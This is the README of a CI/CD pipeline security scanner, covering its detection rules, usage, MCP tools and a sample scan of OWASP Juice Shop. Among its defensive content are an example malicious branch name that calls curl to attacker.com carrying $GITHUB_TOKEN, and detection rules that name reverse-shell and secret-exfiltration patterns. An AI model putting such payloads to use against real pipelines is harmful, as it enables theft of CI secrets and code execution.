kryptonclaw 0.1.0

# Kryptonclaw

**CI/CD Security Scanner for GitHub Actions, GitLab CI, and Jenkins**

Kryptonclaw detects 30+ attack patterns in CI/CD pipelines -- the same vectors used in the HackerBot-Claw campaign (Feb 2026) that compromised workflows across Microsoft, DataDog, CNCF, and Trivy repositories. It scans workflow files via the GitHub API without cloning repos, supports org-wide batch scanning, and outputs SARIF for direct GitHub Code Scanning integration.

```
$ kryptonclaw scan --repo juice-shop/juice-shop

Kryptonclaw Scan Report: juice-shop/juice-shop
Scanned 12 files across 1 repos in 253ms

Findings: 29 total (Critical: 0, High: 9, Medium: 20, Low: 0)
--------------------------------------------------------------------------------
[HIGH] Remote script execution (curl|bash, wget|sh) (KC-104)
  Location: .github/workflows/ci.yml
  Pipeline downloads and executes remote scripts via curl|bash or wget|sh.
  An attacker who compromises the remote URL can execute arbitrary code.
  Fix: Download scripts, verify checksums, then execute.
  CWE: CWE-829

[HIGH] Untrusted input in workflow expression (KC-101)
  Location: .github/workflows/ci.yml
  github.head_ref used in run: step — attacker-controlled branch names
  can inject shell commands via crafted PR branch names.
  Fix: Pass untrusted input via environment variable, not direct interpolation.
  CWE: CWE-94

[MED] Mutable tag reference (KC-003)
  Location: .github/workflows/ci.yml
  Action coverallsapp/github-action@v2 uses a mutable tag.
  Fix: Pin to a full commit SHA: uses: action@<40-char-sha>
  CWE: CWE-829
...
```

---

## Why Kryptonclaw

Most CI/CD security tools focus on container images or dependency scanning. They miss the pipeline itself — the YAML configuration files that define what code runs, with what permissions, and with access to what secrets.

Attackers know this. The HackerBot-Claw campaign exploited `pull_request_target` triggers to run malicious code with write access to base repositories. Unpinned GitHub Actions allowed supply chain poisoning through tag mutation. Workflow injection via `${{ github.event.pull_request.title }}` gave attackers command execution inside trusted pipelines.

Kryptonclaw catches all of these patterns and more. It applies both regex-based detection and YAML-aware structural analysis to find vulnerabilities that simple grep-based tools miss — like a `pull_request_target` trigger combined with `actions/checkout` referencing the PR head SHA in the same job.

**Key capabilities:**

- **API-first scanning** — Fetches workflow files via GitHub Contents API. No git clone, no disk I/O, no repository checkout.
- **Org-wide batch scanning** — Scan every repo in a GitHub organization with a single command. Configurable concurrency, rate-limit aware.
- **30+ detection rules** — GitHub Actions, GitLab CI, Jenkins, plus generic CI/CD patterns. Every rule mapped to CWE IDs with remediation guidance.
- **YAML structural analysis** — Parses workflows into typed structures to detect multi-step attack chains that span triggers, permissions, and steps.
- **SARIF v2.1.0 output** — Drop results directly into GitHub Code Scanning. Also supports JSON and human-readable text.
- **MCP server** — 10 tools for integration with AI assistants and automated security workflows.
- **Red team mode** — Optional exploit scenario generation via armyknife-llm-redteam bridge.

---

## Installation

### From crates.io

```bash
cargo install kryptonclaw
```

This installs both `kryptonclaw` (CLI) and `kryptonclaw-mcp` (MCP server) to `~/.cargo/bin/`.

### From source

```bash
git clone https://github.com/armyknife-social/kryptonclaw.git
cd kryptonclaw
cargo build --release

# Binaries at:
#   target/release/kryptonclaw       (CLI)
#   target/release/kryptonclaw-mcp   (MCP server)
```

Requires Rust 1.75 or later.

### Add to PATH

```bash
# If installed from source:
cp target/release/kryptonclaw ~/.local/bin/
cp target/release/kryptonclaw-mcp ~/.local/bin/
```

---

## Usage

### Scan a single repository

```bash
# API-only scan (no clone, fast)
kryptonclaw scan --repo owner/repo

# With explicit token
kryptonclaw scan --repo owner/repo --token $GITHUB_TOKEN
```

### Scan an entire organization

```bash
# Scan all repos in an org (default: 4 concurrent)
kryptonclaw scan --org my-company

# Higher concurrency for large orgs
kryptonclaw scan --org my-company --concurrency 8

# Only show high and critical findings
kryptonclaw scan --org my-company --min-severity high
```

### Scan a local directory

```bash
# Scan local .github/workflows/ files
kryptonclaw scan --path /path/to/repo

# Deep scan (walks entire directory tree)
kryptonclaw scan --path /path/to/repo --deep
```

### Output formats

```bash
# Human-readable (default)
kryptonclaw scan --repo owner/repo

# JSON (full report structure)
kryptonclaw scan --repo owner/repo --format json

# SARIF v2.1.0 (GitHub Code Scanning)
kryptonclaw scan --repo owner/repo --format sarif -o results.sarif
```

### Upload to GitHub Code Scanning

```bash
kryptonclaw scan --repo owner/repo --format sarif -o results.sarif
gh code-scanning upload results.sarif
```

### List detection rules

```bash
kryptonclaw rules
```

```
Rule ID    Severity   CWE          Description
--------------------------------------------------------------------------------
KC-001     HIGH       CWE-269      workflow_run trigger (privilege escalation chain)
KC-002     HIGH       CWE-829      Unpinned action reference (branch/tag instead of SHA)
KC-003     MEDIUM     CWE-829      Mutable tag ref (e.g., @v4 instead of @v4.1.1 or full SHA)
KC-004     MEDIUM     CWE-494      Artifact upload/download without verification
KC-005     CRITICAL   CWE-94       actions/github-script with user-controlled input
...
```

### Red team mode

```bash
# Generate exploit scenarios for each finding
kryptonclaw scan --repo owner/repo --redteam
```

Requires `armyknife-llm-redteam-mcp` on PATH. When enabled, each finding is analyzed to produce a proof-of-concept attack scenario with MITRE ATT&CK mappings.

---

## Detection Rules

Kryptonclaw ships with 30+ rules organized by CI platform. Every rule includes a CWE mapping, severity classification, and remediation guidance.

### GitHub Actions

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-100 | Critical | 863 | `pull_request_target` trigger — runs with write access and base repo secrets |
| KC-005 | Critical | 94 | `actions/github-script` with user-controlled input — JS execution with full GITHUB_TOKEN |
| KC-102 | Critical | 200 | Secret exfiltration via `curl`/`wget` to external endpoints |
| KC-103 | Critical | 78 | Reverse shell patterns (`netcat -e`, `/dev/tcp/`) |
| KC-001 | High | 269 | `workflow_run` trigger — privilege escalation chain from fork PRs |
| KC-002 | High | 829 | Unpinned action refs (`@main`, `@master`) — mutable, supply chain risk |
| KC-008 | High | 20 | Composite action `${{ inputs.* }}` in `run:` steps without validation |
| KC-009 | High | 200 | `secrets: inherit` passes all repository secrets to called workflows |
| KC-010 | High | 269 | `permissions: write-all` grants GITHUB_TOKEN full access |
| KC-011 | High | 94 | Expanded context injection (`discussion.body`, `review.body`, `pages.*.page_name`) |
| KC-014 | High | 269 | OIDC `id-token: write` — over-scoped cloud provider access |
| KC-101 | High | 94 | Untrusted input injection (`issue.body`, `pull_request.title`, `head_ref`) |
| KC-104 | High | 829 | `curl \| bash` / `wget \| sh` — remote script execution |
| KC-105 | High | 200 | `ACTIONS_RUNTIME_TOKEN` exposure in logs or untrusted processes |
| KC-003 | Medium | 829 | Mutable tag refs (`@v4` instead of `@v4.1.1` or full SHA) |
| KC-004 | Medium | 494 | Artifact upload/download without checksum verification |
| KC-006 | Medium | 250 | Self-hosted runner usage — persistent state enables backdoors |
| KC-007 | Medium | 269 | Missing `permissions:` block — may default to `write-all` |
| KC-012 | Medium | 601 | Environment URL injection — phishing via deployment URLs |
| KC-013 | Medium | 345 | Cache poisoning via predictable `actions/cache` keys |

### GitLab CI

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-204 | High | 250 | `privileged: true` container execution — host escape risk |
| KC-200 | Medium | 829 | Remote/cross-project `include:` tampering |
| KC-201 | Medium | 693 | `allow_failure: true` on security scanning stages |
| KC-203 | Medium | 200 | Variable expansion without protected/masked CI/CD variables |
| KC-205 | Medium | 200 | Trigger tokens referenced directly instead of as protected variables |
| KC-202 | Low | 693 | Manual security gates that can be skipped |

### Jenkins

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-300 | Critical | 829 | `@Grab` dependency injection — arbitrary runtime downloads |
| KC-301 | High | 78 | Shell injection via Groovy string interpolation in `sh` steps |
| KC-304 | High | 693 | `@NonCPS` Groovy sandbox bypass — arbitrary code on controller |
| KC-306 | High | 269 | Admin permission checks in pipeline code |
| KC-302 | Medium | 829 | Dynamic `load()` pipeline library loading |
| KC-305 | Medium | 829 | `@Library` without version pin — mutable default branch |
| KC-303 | Low | 200 | `withCredentials` scope too broad |

### YAML Structural Analysis

Beyond regex matching, kryptonclaw parses GitHub Actions workflows into typed structures and applies semantic checks:

- **HackerBot-Claw pattern detection**: Identifies `pull_request_target` trigger combined with `actions/checkout` referencing `github.event.pull_request.head.sha` or `github.head_ref` in the same job. This is the exact attack chain used in the Feb 2026 campaign.
- **Composite input injection**: Detects `${{ inputs.* }}` interpolation in `run:` steps across parsed job definitions.
- **Workflow dispatch input injection**: Finds `${{ github.event.inputs.* }}` used directly in shell commands.

Structural analysis catches patterns that span multiple YAML keys and cannot be reliably detected with single-line regex.

### Additional Scanners

Kryptonclaw also includes:

- **Secrets scanner** — 12 credential patterns (AWS keys, GitHub PATs, Slack tokens, OpenAI keys, private keys, database passwords). Applied to all scanned files.
- **Supply chain scanner** — 40+ known typosquatted package names, malicious lifecycle hooks, custom registry detection, dependency confusion patterns. Covers npm, PyPI, Cargo, Go modules, RubyGems.

---

## Supported CI/CD Platforms

| Platform | File Detection | Rules |
|----------|----------------|-------|
| GitHub Actions | `.github/workflows/*.yml` | 20 dedicated + generic |
| GitLab CI | `.gitlab-ci.yml` | 6 dedicated + generic |
| Jenkins | `Jenkinsfile`, `Jenkinsfile.*` | 7 dedicated + generic |
| Travis CI | `.travis.yml` | Generic patterns |
| CircleCI | `.circleci/*.yml` | Generic patterns |
| Azure Pipelines | `azure-pipelines.yml` | Generic patterns |

Platform detection works by file path and, for ambiguous YAML files, by content heuristics (`runs-on:` + `steps:` = GitHub Actions, `stages:` + `script:` = GitLab CI).

---

## MCP Server

Kryptonclaw includes a Model Context Protocol server with 10 tools for integration with AI assistants and automated security workflows.

```bash
# Start the MCP server
kryptonclaw-mcp
```

### MCP Configuration

Add to your MCP client configuration:

```json
{
  "mcpServers": {
    "kryptonclaw": {
      "type": "stdio",
      "command": "kryptonclaw-mcp",
      "args": []
    }
  }
}
```

### Available Tools

| Tool | Description |
|------|-------------|
| `kryptonclaw_scan_repo` | Scan a single repo via GitHub Contents API |
| `kryptonclaw_scan_org` | Scan all repos in a GitHub organization |
| `kryptonclaw_scan_workflow` | Scan raw workflow YAML content (paste directly) |
| `kryptonclaw_findings` | Query and filter findings from the last scan |
| `kryptonclaw_rules` | List all detection rules with metadata |
| `kryptonclaw_explain` | Explain a rule by ID with full remediation guidance |
| `kryptonclaw_redteam` | Generate exploit scenario for a specific finding |
| `kryptonclaw_sarif` | Export last scan as SARIF v2.1.0 JSON |
| `kryptonclaw_status` | Show scan status and cached findings count |
| `kryptonclaw_config` | Get configuration values |

All tools accept a `token` parameter or fall back to the `GITHUB_TOKEN` / `GH_TOKEN` environment variable. Output is automatically sanitized to redact credentials.

---

## Architecture

```
kryptonclaw
├── cli/                    Command-line interface (clap 4)
├── core/                   Engine, findings, config, reports
├── plugins/
│   └── builtin/
│       ├── cicd/           CI/CD scanner (regex + YAML parser)
│       │   ├── github_actions.rs
│       │   ├── gitlab_ci.rs
│       │   ├── jenkins.rs
│       │   ├── parser.rs   YAML structural analysis
│       │   └── rules.rs    Rule definitions + matching engine
│       ├── secrets.rs      Credential pattern detection
│       └── supply_chain.rs Package supply chain analysis
├── platform/               GitHub API client (Contents API, org listing)
├── scan/                   API-only and batch scanning orchestration
├── mcp/                    MCP server (10 tools, rmcp 0.16)
├── output/                 Text, JSON, SARIF formatters
└── redteam/                armyknife-llm-redteam bridge
```

**Design principles:**

- **API-first**: Default scanning mode uses the GitHub Contents API. No git clone, no disk writes, no repository checkout. This makes org-wide scanning fast and safe.
- **Defense in depth**: Regex rules catch known patterns fast. YAML parsing catches structural patterns that span multiple keys. Both run on every file.
- **Fail open on parsing**: Malformed YAML (sometimes intentional in attack scenarios) falls back to regex-only scanning rather than skipping the file.
- **Rate limit awareness**: The GitHub API client tracks remaining requests via `x-ratelimit-remaining` headers. Scanning stops gracefully when the budget is exhausted rather than hammering a 403.
- **Async throughout**: Built on Tokio with async HTTP, async plugin execution, and async batch orchestration.

---

## Environment Variables

| Variable | Purpose |
|----------|---------|
| `GITHUB_TOKEN` | GitHub API authentication (primary) |
| `GH_TOKEN` | GitHub API authentication (fallback) |

---

## SARIF Integration

Kryptonclaw produces SARIF v2.1.0 output compatible with GitHub Code Scanning, VS Code SARIF Viewer, and other SARIF-consuming tools.

SARIF output includes:
- `reportingDescriptor` entries for each rule with ID, description, severity, and CWE tags
- `result` entries for each finding with physical location (file path + line number)
- Severity mapping: Critical/High to `error`, Medium to `warning`, Low/Info to `note`

```bash
# Generate and upload to GitHub Code Scanning
kryptonclaw scan --org my-company --format sarif -o scan.sarif
gh code-scanning upload scan.sarif --ref refs/heads/main
```

---

## Performance

| Scenario | Typical Time |
|----------|-------------|
| Single repo (API-only, 3 workflow files) | 1-2 seconds |
| Organization (50 repos) | 2-5 minutes |
| Organization (200 repos, concurrency 8) | 8-15 minutes |
| Local directory scan | < 1 second |

Rate limits: Authenticated GitHub API allows 5,000 requests/hour. Each repo scan uses 2-10 API calls depending on workflow count. A 200-repo org scan uses roughly 1,000-2,000 API calls.

---

## Real-World Test: OWASP Juice Shop

To validate detection accuracy, kryptonclaw was run against [OWASP Juice Shop](https://github.com/juice-shop/juice-shop) -- one of the most popular intentionally vulnerable web applications, maintained by the OWASP Foundation with 12 GitHub Actions workflow files.

```
$ kryptonclaw scan --repo juice-shop/juice-shop

Kryptonclaw Scan Report: juice-shop/juice-shop
Scanned 12 files across 1 repos in 253ms

Findings: 29 total (Critical: 0, High: 9, Medium: 20, Low: 0)
```

### Findings Breakdown

**HIGH severity (9 findings)**

| Rule | File | Finding |
|------|------|---------|
| KC-104 | `ci.yml` | `curl \| bash` remote script execution -- Heroku CLI install via `curl https://cli-assets.heroku.com/install.sh \| sh` downloads and executes a remote script without checksum verification. If the Heroku CDN is compromised, arbitrary code runs inside the CI pipeline with full access to secrets. |
| KC-101 | `ci.yml` | Branch name injection via `github.head_ref` -- the workflow interpolates `${{ github.head_ref }}` directly into a `run:` step. An attacker can craft a PR with a branch name like `` `curl attacker.com/steal?t=$GITHUB_TOKEN` `` to exfiltrate secrets. |
| KC-101 | `codeql-analysis.yml` | Same `github.head_ref` injection pattern in the CodeQL analysis workflow. |
| KC-101 | `rebase-nightly.yml` | Same pattern -- branch name interpolation in the nightly rebase workflow. |
| KC-101 | `update-challenges.yml` | Same pattern in the challenge update workflow. |
| KC-101 | `lint-fixer.yml` | Same pattern in the lint auto-fix workflow. |
| KC-101 | `test-desktop-app.yml` | Same pattern in the Electron desktop app test workflow. |
| KC-101 | `update-challenges-on-comment.yml` | Same pattern triggered by issue comments. |
| KC-104 | `release.yml` | Second `curl \| bash` instance in the release workflow. |

**MEDIUM severity (20 findings)**

| Rule | Count | Finding |
|------|-------|---------|
| KC-007 | 10 | Missing `permissions:` block -- 10 of 12 workflow files have no explicit permissions declaration. When the repository's default token permissions are set to "read and write," every workflow runs with full write access to the repository, packages, and deployments. |
| KC-003 | 6 | Mutable tag references -- Actions like `coverallsapp/github-action@v2`, `github/codeql-action/init@v3`, and `github/codeql-action/analyze@v3` use major version tags instead of full commit SHAs. If a tag is force-pushed by a compromised maintainer, the workflow silently runs different code. |
| KC-004 | 4 | Artifact upload/download without verification -- `actions/upload-artifact` and `actions/download-artifact` used without checksum verification. Artifacts can be tampered with between upload and download in multi-job workflows. |

### Key Takeaways

1. **Branch name injection is systemic.** 7 of 12 workflows interpolate `github.head_ref` directly into shell commands. This is the same class of vulnerability that enabled the HackerBot-Claw campaign -- attackers control the branch name, and the branch name becomes code.

2. **Remote script execution is a real supply chain risk.** The Heroku CLI install via `curl | sh` trusts a third-party CDN to deliver unmodified code. A compromised CDN or DNS hijack gives an attacker code execution inside CI with access to deployment credentials.

3. **Missing permissions declarations are pervasive.** 10 of 12 workflows rely on repository defaults instead of explicitly scoping GITHUB_TOKEN permissions. The principle of least privilege is not applied.

4. **Mutable action references enable silent supply chain attacks.** Using `@v2` or `@v3` instead of pinned commit SHAs means a compromised upstream action can inject malicious code into every workflow run without any visible change in the workflow file.

5. **Scan completed in 253ms** via the GitHub Contents API -- no repository clone, no disk I/O, 12 files fetched and analyzed across 30+ detection rules.

---

## Contributing

Contributions are welcome. To add a new detection rule:

1. Choose the appropriate module (`github_actions.rs`, `gitlab_ci.rs`, `jenkins.rs`, or `rules.rs` for generic patterns)
2. Add a `RegexRule` entry with: rule ID (`KC-NNN`), regex pattern, title, severity, description, remediation, CWE IDs
3. Add rule metadata to `all_rules()` in `rules.rs`
4. Add a test case in `cicd/mod.rs`
5. Run `cargo test` to verify

---

## License

Dual-licensed under [MIT](LICENSE-MIT) and [Apache 2.0](LICENSE-APACHE). Choose whichever you prefer.